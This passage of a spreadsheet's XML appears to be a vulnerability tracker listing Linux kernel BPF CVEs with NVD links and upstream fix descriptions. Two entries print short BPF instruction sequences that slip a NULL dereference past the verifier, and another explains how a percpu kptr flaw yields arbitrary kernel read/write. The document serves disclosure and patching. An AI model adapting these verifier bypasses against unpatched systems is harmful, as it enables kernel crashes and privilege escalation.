          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Cancel special fields when recycling rhtab elements
rhtab_map_update_existing() and rhtab_delete_elem() call
bpf_obj_free_fields() when replacing or deleting a value. These map
operations can run from BPF programs in NMI context, where releasing a
referenced kptr or another complex field is not generally safe.
Array and hash maps avoid that problem by cancelling only the asynchronous
fields which can be stopped safely in the caller context. Other ownership
state remains attached to the allocation until its memory allocator
destructor performs the final cleanup.
Use bpf_obj_cancel_fields() for the corresponding rhtab paths as well. This
cancels timers, workqueues, and task work while allowing rhtab_mem_dtor() to
release referenced kptrs when the allocation is eventually destroyed.
[ kkd: Rebased, used direct helper calls, and rewrote the commit log ]</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98035</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98036</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve special fields in recycled rhtab elements
rhtab_map_update_elem() initializes special fields after obtaining an
element from bpf_mem_cache_alloc(). The allocator can return a fresh,
zeroed unit, or recycle one from its RCU-pending lists before the
registered destructor has run.
A BPF program can retain a map-value pointer after deleting its element
and initialize and arm a timer through that pointer. If the deleted unit
is recycled, check_and_init_map_value() clears the only pointer to the
timer. Neither a later deletion nor rhtab_mem_dtor() can then cancel it,
and the callback can run with its key and value pointing into freed memory.
Do not reinitialize special fields on insertion. Fresh allocator units are
already zeroed. For recycled units, the special fields are ownership state
that must remain visible to the eventual destructor. copy_map_value()
already skips those fields, matching the non-preallocated hash-map path and
the lifecycle established by commit 275c30bcee66 ("bpf: Don't reinit map
value in prealloc_lru_pop").
[ kkd: Split out the fix and rewrote the commit log ]</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98036</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98037</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject untrusted allocated-object pointers
When the final RCU read-side critical section ends, a local kptr is demoted
to PTR_UNTRUSTED but retains MEM_ALLOC. The pointer may be NULL or may refer
to an object whose lifetime is no longer protected.
type_is_ptr_alloc_obj() nevertheless recognizes any PTR_TO_BTF_ID with
MEM_ALLOC as a live allocated object. In particular, a refcount-only local
kptr never carries NON_OWN_REF, so it still passes the
bpf_refcount_acquire() argument check after RCU protection ends. The kfunc
can then dereference NULL or stale memory.
Make type_is_ptr_alloc_obj() reject PTR_UNTRUSTED pointers. Since
type_is_non_owning_ref() is based on the same predicate, graph kfunc
arguments obey the same live-object requirement. Fault-protected reads of
the demoted pointer remain valid: writes are already rejected, and read
fixups use bpf_may_fault_on_deref() rather than this predicate.
[ kkd: Rewrote commit log ]</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98037</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98038</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Keep refcount_acquire nullable for borrowed RCU kptrs
bpf_refcount_acquire() is fallible for a borrowed reference because the
object may have reached a zero refcount. The verifier therefore keeps
KF_RET_NULL on the return value unless the argument is an owning reference.
An RCU-protected load of a local kptr is marked MEM_ALLOC, but it only
receives NON_OWN_REF when the pointee contains a graph node. A refcounted
object without a graph node consequently looks like an owning reference
even though the loaded register has no acquired reference state. If the
program drops the last real reference while remaining in the RCU critical
section, refcount_inc_not_zero() returns NULL while the verifier treats the
result as non-NULL.
Only classify the argument as owning when it is backed by a verifier-tracked
reference. This retains the non-NULL return for pointers from bpf_obj_new(),
bpf_kptr_xchg(), or an earlier successful acquisition, while requiring a
NULL check for borrowed RCU kptrs.
[ kkd: Rewrote commit log ]</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98038</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98039</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Require MEM_PERCPU for percpu kptr stores
map_kptr_match_type() treats perm_flags as the set of register type flags
that a kptr field permits. Adding MEM_PERCPU to that set for
BPF_KPTR_PERCPU does not require the source register to carry it, however.
The subset test consequently accepts both a plain bpf_obj_new() allocation
and a referenced kernel pointer into a __percpu_kptr map field.
Loads from the field are always marked MEM_PERCPU. Consumers then treat the
stored value as the cookie returned by bpf_percpu_obj_new(): per-CPU pointer
helpers relocate it, and map teardown selects the per-CPU free path. A plain
allocation can therefore provide an arbitrary kernel read/write, while a
kernel pointer can be relocated into an invalid address or sent through a
missing destructor.
Require the source MEM_PERCPU flag to match the destination field kind.
This preserves valid bpf_percpu_obj_new() stores and rejects both the
program-BTF and kernel-BTF variants.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98039</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98040</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark the zero register precise for a register-form NULL check
check_cond_jmp_op() accepts "if rA &lt;op&gt; rB" as a NULL check for a
nullable pointer rA when rB is a scalar known to be zero,
lifts PTR_MAYBE_NULL from rA in the corresponding branch and does not
mark rB precise. Consider the following program:
  r0 = bpf_get_prandom_u32();
  r6 = 1;                  /* the r6 == 0 path is explored first */
  if (r0 == 0) goto 1f;
  r6 = 0;
1:
  r0 = bpf_map_lookup_elem(map, &amp;0);  /* absent, NULL at runtime */
  if (r0 == r6) goto 2f;   /* taken as a NULL check for r0       */
  *(u8 *)(r0 + 0);         /* verifier: map value; runtime: zero */
2:
  return 0;
The r6 == 0 path is explored first and the dereference is accepted.
The r6 == 1 path is pruned at the checkpoint recorded for (1),
so the comparison is never verified with a non-zero r6. At runtime a
failed lookup returns NULL, NULL != 1 takes the non-NULL edge and the
program dereferences a pointer that is zero.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98040</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98042</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't resurrect a scalar id dropped by collect_linked_regs()
check_cond_jmp_op() copies the compared registers into
env-&gt;{false,true}_reg{1,2} before collect_linked_regs() runs and copies
those snapshots back into both branch states afterwards.
collect_linked_regs() records at most LINKED_REGS_MAX members of a
linked registers group in the jump history and calls clear_scalar_id()
for every member that does not fit. The compared register is not exempt
from that.
As a consequence, sync_linked_regs() might adjust ranges for more
registers than bpf_bt_sync_linked_regs() can propagate precision to.
Collect the linked registers before the snapshots are taken instead.
This might lead to some unnecessary clear_scalar_id's, but from
previous testing situations with many linked registers are
extremely rare.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98042</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98043</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't infer non-NULL from a pointer with an unbounded offset
reg_not_null() decides that a register holds a non-NULL value by
looking at its type alone. For pointer types that allow arithmetic the
type only guarantees a non-NULL base, in case of an unbound offset
the runtime offset value might still add up to NULL.
Consider the followng program:
  r6 = bpf_map_lookup_elem(map, &amp;0);  /* present */
  if (r6 == 0) return 0;
  r7 = bpf_map_lookup_elem(map, &amp;1);  /* absent, NULL at runtime */
  r8 = r7;
  r8 -= r6;     /* pointer - pointer: unknown scalar, -r6 */
  r8 &lt;&lt;= 1;
  r8 &gt;&gt;= 1;     /* any non-negative offset is accepted by */
                /* check_reg_sane_offset_ptr() */
  r6 += r8;     /* verifier: map value;    runtime: zero  */
  if (r7 != r6) return 0;
  *(u8 *)(r7 + 0);  /* r7 is inferred non-NULL, both are zero */
At runtime both registers are zero, the comparison is true and the
load faults with NULL pointer dereference.
Require the offset to be within +-BPF_MAX_VAR_OFF in reg_not_null().</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98043</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98044</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject legacy packet loads from callbacks
check_ld_abs() models a failed BPF_LD_ABS or BPF_LD_IND in a
subprogram as an implicit return with R0 set to zero. It calls
prepare_func_exit() to explore this synthesized path.
When the load is reached directly from a synchronous callback,
prepare_func_exit() enforces the callback return contract and marks R0
precise. R0 is not derived from a real instruction on this path, so
precision backtracking reaches the callback call with R0 still requested
and triggers the "callback unexpected regs" verifier bug. A privileged
program loader can therefore cause a verifier warning and an -EFAULT
BPF_PROG_LOAD.
These legacy packet-load instructions are deprecated. Reject them from
callbacks rather than complicating their implicit-return model. Check all
active frames before constructing the implicit return so nested static
subprograms cannot hide the callback context.
Global functions are verified independently with a fresh frame zero, so
an active-frame check cannot identify a global function called from a
callback. Also check the complete subprogram call graph during stack-depth
validation and reject a function containing a legacy load when any caller
is a callback. This covers global and static descendants without making
has_ld_abs transitive, preserving its per-function BTF return-type check.
Ordinary uses outside callbacks remain supported.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98044</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98045</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark faultable stack helpers as sleepable
The faultable variants of bpf_get_stack() and bpf_get_task_stack() pass
may_fault=true into the common stack collection code. Resolving user-space
build IDs may then call build_id_parse_file() and block on filesystem
reads.
Neither helper prototype sets might_sleep. Since prototype selection uses
the sleepability of the whole program, the verifier can still allow these
helpers from a non-sleepable region within that program, such as an
explicit RCU or preemption-disabled region. The task-stack helper can also
be called from a non-sleepable timer callback of a sleepable program.
Mark both faultable prototypes as sleepable. The existing helper context
check then rejects these calls while continuing to allow them in genuinely
sleepable contexts.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98045</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98046</t>
        </is>
      </c>
      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark bpf_btf_find_by_name_kind() as sleepable
When bpf_btf_find_by_name_kind() finds a type in module BTF, it
returns a new BTF object fd through __btf_new_fd(). This reaches
anon_inode_getfd(), which can sleep while allocating or expanding the
current task fd table.
The helper prototype does not set might_sleep, so the verifier allows
the helper in non-sleepable contexts such as BPF timer callbacks. The
fd allocation can then sleep in softirq context and install the fd into
the interrupted task.
Mark the helper as sleepable. This preserves calls from the main body
of a sleepable syscall program while rejecting calls from its
non-sleepable regions.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98046</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98047</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check ancestor frames for rbtree callbacks
bpf_rbtree_add() invokes its comparator while the caller holds the root
lock. The native insertion code retains raw parent and link pointers across
the callback, so the verifier prohibits unlocking, consuming tree nodes,
or changing RCU state from that callback.
in_rbtree_lock_required_cb() only checks the innermost verifier frame.
Static subprogram calls are permitted while holding a spin lock, and such a
call pushes a frame without in_callback_fn set. Consequently, all callback
restrictions disappear in the nested frame. The subprogram can unlock the
tree, remove and drop the node being compared, then relock. Native insertion
resumes with the stale parent pointer and links freed memory into the tree.
Walk all active frames for the rbtree callback instead. Benign static
subprograms remain permitted, while callback restrictions follow execution
into nested frames.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98047</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98048</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: don't rewrite bpf_fastcall patterns entered by a jump
mark_fastcall_pattern_for_call() must ensure that matched
"spill; call; fill" instruction series is not interrupted by a jump.
Otherwise the rewrite applied by bpf_remove_fastcall_spills_fills()
is not sound.
Record the instructions targeted by jumps in
insn_aux_data[*].jump_target when the CFG is built and use this flag
to stop growing a pattern at such an instruction. Jumps to the first
spill are fine.
Note that existing insn_aux_data[*].jmp_point field can't be reused,
as it marks subprogram return instructions.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98048</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98049</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: zero extend the result of an arena 32-bit cmpxchg
bpf_convert_ctx_accesses() rewrites an atomic on an arena pointer from
BPF_STX | BPF_ATOMIC to BPF_STX | BPF_PROBE_ATOMIC, and it runs before
bpf_opt_subreg_zext_lo32_rnd_hi32().
That pass emits an explicit zero extension for a 32-bit cmpxchg even
when bpf_jit_needs_zext() is false. This is done because on some
architectures 32-bit cmpxchg requires explicit zero extension for the
dst register. E.g. on x86-64 'lock cmpxchg' does not change the %eax
if comparison is successful, while BPF semantics declare that each
operation on a 32-bit register zero extends it's upper half.
is_cmpxchg_insn() matches BPF_MODE == BPF_ATOMIC only, so an arena
cmpxchg misses said zero extension adjustment. This patch adjusts
is_cmpxchg_insn() to match BPF_PROBE_ATOMIC alongside BPF_ATOMIC.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98049</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98051</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
